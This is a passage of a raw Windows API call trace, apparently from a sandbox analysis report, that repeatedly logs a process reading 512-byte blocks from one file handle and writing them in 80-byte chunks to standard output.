(in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] GetFileType (hFile=0x50) returned 0x1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] GetFileType (hFile=0x50) returned 0x1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] GetFileType (hFile=0x50) returned 0x1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] GetFileType (hFile=0x50) returned 0x1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] GetFileType (hFile=0x50) returned 0x1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] GetFileType (hFile=0x50) returned 0x1 [0145.361] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] GetFileType (hFile=0x50) returned 0x1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] GetFileType (hFile=0x50) returned 0x1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.361] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.361] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, 
lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, 
lpOverlapped=0x0) returned 1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.363] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.363] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] GetFileType (hFile=0x50) returned 0x1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] GetFileType (hFile=0x50) returned 0x1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] GetFileType (hFile=0x50) returned 0x1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] GetFileType (hFile=0x50) returned 0x1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] WriteFile (in: hFile=0x50, 
lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] GetFileType (hFile=0x50) returned 0x1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] GetFileType (hFile=0x50) returned 0x1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] GetFileType (hFile=0x50) returned 0x1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] GetFileType (hFile=0x50) returned 0x1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.364] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.364] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.364] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0145.364] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] GetFileType (hFile=0x50) returned 0x1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] GetFileType (hFile=0x50) returned 0x1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] GetFileType (hFile=0x50) returned 0x1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] GetFileType (hFile=0x50) returned 0x1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] GetFileType (hFile=0x50) returned 0x1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] 
GetFileType (hFile=0x50) returned 0x1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] GetFileType (hFile=0x50) returned 0x1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] GetFileType (hFile=0x50) returned 0x1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.365] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.365] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.366] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | 
out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, 
lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] GetFileType (hFile=0x50) returned 0x1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.367] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.367] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] GetFileType (hFile=0x50) returned 0x1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] GetFileType (hFile=0x50) returned 0x1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] GetFileType (hFile=0x50) returned 0x1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] GetFileType (hFile=0x50) returned 0x1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 
[0145.367] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] GetFileType (hFile=0x50) returned 0x1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] GetFileType (hFile=0x50) returned 0x1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] GetFileType (hFile=0x50) returned 0x1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] GetFileType (hFile=0x50) returned 0x1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.368] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) 
returned 1 [0145.368] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.368] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] GetFileType (hFile=0x50) returned 0x1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] GetFileType (hFile=0x50) returned 0x1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] GetFileType (hFile=0x50) returned 0x1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] GetFileType (hFile=0x50) returned 0x1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] GetFileType (hFile=0x50) returned 0x1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.369] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0145.369] GetFileType (hFile=0x50) returned 0x1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] GetFileType (hFile=0x50) returned 0x1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] GetFileType (hFile=0x50) returned 0x1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.369] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.369] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] GetFileType (hFile=0x50) returned 0x1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] GetFileType (hFile=0x50) returned 0x1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, 
